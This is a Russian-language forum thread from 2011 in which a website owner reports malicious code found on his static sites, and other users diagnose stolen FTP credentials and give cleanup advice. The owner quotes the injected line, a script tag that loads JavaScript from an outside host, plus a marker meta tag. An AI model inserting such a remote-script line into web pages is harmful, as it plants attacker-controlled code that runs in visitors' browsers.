Форум SAPE.RU - Обнаружен вредоносный код на сайте

Форум SAPE.RU (http://forum.sape.ru/index.php)

- Вопросы от новичков (http://forum.sape.ru/forumdisplay.php?f=25)

- - Обнаружен вредоносный код на сайте (http://forum.sape.ru/showthread.php?t=67965)

Салоед

12.04.2011 21:18

Обнаружен вредоносный код на сайте

День добрый панове.
Ситуация следующая. ЯВМ обнаружил вредоносный код на главных страницах некоторых моих сайтов. Все сайты статичные, на ХТМЛ и ЦСС. Пароли фтп-доступа известны только Сапе.
Вредоносный код я сразу увидел глазами, просмотрев код страниц. Вот он:

<script type="text/javascript" src="http://ist.net.tr/js.php"></script>

и вот еще:

<meta name='fd348c652c50e6a87fd1beef14fed626' content=''>



Вопрос: как это вообще возможно и где искать дыры?
Я просмотрел резервные копии файлов главных страниц у себя на компе, там этого кода нет.

SergejF

12.04.2011 21:22

Цитата:

Сообщение от Салоед (Сообщение 1054708)

как это вообще возможно и где искать дыры?

Дыры ищите у себя в компьютере. фтп-клиентом каким пользуетесь?

Цитата:

Сообщение от Салоед (Сообщение 1054708)

Пароли фтп-доступа известны только Сапе.

Врёте.

Салоед

12.04.2011 21:25

Ну кроме сапы еще и мне. Так, дыра точно у меня в компе. На сайте, который не в сапе тоже нашел вредоносный код. Пользуюсь старой файрзиллой. Что-то конкретное порекомендуете?

SergejF

12.04.2011 22:28

Цитата:

Сообщение от Салоед (Сообщение 1054714)

Что-то конкретное порекомендуете?

Меняем пароли доступа, проверяем комп KIS с последними базами и CureIt, затем снова меняем пароли. Не на старые!

mirsobchak.ru

12.04.2011 23:52

было подобное, с тех пор практически ежедневно обновляю антивирусную базу

chahlic

13.04.2011 00:36

Цитата:

Сообщение от Салоед (Сообщение 1054714)

Что-то конкретное порекомендуете?

И не хранить пароли в фтп-клиенте

Часовой пояс GMT +3, время: 23:21.